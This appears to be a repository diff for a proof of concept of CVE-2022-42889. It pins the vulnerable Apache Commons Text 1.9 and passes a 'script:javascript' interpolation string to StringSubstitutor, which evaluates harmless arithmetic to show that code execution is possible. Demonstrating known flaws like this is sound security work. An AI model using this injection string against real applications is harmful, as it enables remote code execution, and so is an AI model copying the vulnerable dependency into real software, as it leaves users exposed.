STRLCPY/CVE-2022-42889-PoC

■ ■ ■ ■ ■ ■

pom.xml

1	+	<?xml version="1.0" encoding="UTF-8"?>
2	+	<project xmlns="http://maven.apache.org/POM/4.0.0"
3	+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4	+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5	+	<modelVersion>4.0.0</modelVersion>
6	+
7	+	<groupId>com.seanwrightsec.poc</groupId>
8	+	<artifactId>CVE-2022-42889</artifactId>
9	+	<version>1.0-SNAPSHOT</version>
10	+
11	+	<properties>
12	+	<maven.compiler.source>11</maven.compiler.source>
13	+	<maven.compiler.target>11</maven.compiler.target>
14	+	<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15	+	</properties>
16	+
17	+	<dependencies>
18	+	<dependency>
19	+	<groupId>org.apache.commons</groupId>
20	+	<artifactId>commons-text</artifactId>
21	+	<version>1.9</version>
22	+	</dependency>
23	+	</dependencies>
24	+
25	+	</project>

■ ■ ■ ■ ■ ■

src/main/java/com/seanwrightsec/poc/PoC.java

1	+	package com.seanwrightsec.poc;
2	+
3	+	import org.apache.commons.text.StringSubstitutor;
4	+
5	+	public class PoC {
6	+	public static void main(String[] args) {
7	+	StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();
8	+	String output = stringSubstitutor.replace("${script:javascript:195 + 324}");
9	+	System.out.println("Output: " + output);
10	+	}
11	+	}